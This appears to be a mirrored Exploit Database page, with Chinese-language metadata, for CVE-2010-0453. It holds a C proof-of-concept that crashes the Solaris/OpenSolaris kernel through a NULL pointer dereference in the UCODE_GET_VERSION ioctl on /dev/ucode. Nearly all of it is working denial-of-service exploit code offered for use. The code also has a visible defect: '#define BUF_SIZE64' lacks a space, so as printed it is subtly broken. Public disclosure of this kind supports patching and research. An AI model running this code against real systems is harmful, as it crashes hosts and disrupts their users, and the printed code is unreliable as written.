Solaris/Open Solaris UCODE_GET_VERSION IOCTL – Denial of Service

• Exploit Database
• 14 阅读

• 作者： Patroklos Argyroudis
  日期： 2010-02-07
• 类别：

  • dos
  平台：

  • solaris
• 来源：https://www.exploit-db.com/exploits/11351/

• /*
   * cve-2010-0453.c -- Patroklos Argyroudis, argp at domain census-labs.com
   *
   * Denial of service (kernel panic) PoC exploit for the UCODE_GET_VERSION
   * ioctl NULL pointer dereference vulnerability on Solaris/OpenSolaris:
   *
   * http://www.trapkit.de/advisories/TKADV2010-001.txt
   * http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0453
   *
   * Greets to Tobias Klein for discovering the vulnerability and for his
   * detailed (as always) advisory.
   *
   * $Id: cve-2010-0453.c,v 35da14215c84 2010/02/07 19:15:13 argp $
   */
  
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>
  #include <unistd.h>
  #include <stropts.h>
  #include <sys/mman.h>
  #include <sys/types.h>
  #include <sys/stat.h>
  #include <fcntl.h>
  
  #define BUF_SIZE64
  #define UCODE_DEV "/dev/ucode"
  
  #define UCODE_IOC (('u' << 24) | ('c' << 16) | ('o' << 8))
  #define UCODE_GET_VERSION (UCODE_IOC | 0)
  
  typedef enum ucode_errno
  {
  EM_OK,
  EM_FILESIZE,
  EM_OPENFILE,
  EM_FILEFORMAT,
  EM_HEADER,
  EM_CHECKSUM,
  EM_INVALIDARG,
  EM_NOMATCH,
  EM_HIGHERREV,
  EM_NOTSUP,
  EM_UPDATE,
  EM_SYS,
  EM_NOVENDOR,
  EM_NOMEM
  } ucode_errno_t;
  
  struct ucode_get_rev_struct
  {
  uint32_t *ugv_rev;
  int ugv_size;
  ucode_errno_t ugv_errno;
  };
  
  int
  main()
  {
  int fd, ret;
  uint32_t buf[BUF_SIZE];
  struct ucode_get_rev_struct in_h;
  
  memset(buf, 0x41, BUF_SIZE);
  
  in_h.ugv_rev = buf;
  in_h.ugv_size = 0;
  
  fd = open(UCODE_DEV, O_RDONLY);
  ret = ioctl(fd, UCODE_GET_VERSION, &in_h);
  
  printf("[+] ret = %d\n", ret);
  printf("[+] ugv_errno = %d\n", in_h.ugv_errno);
  
  close(fd);
  return ret;
  }
  
  /* EOF */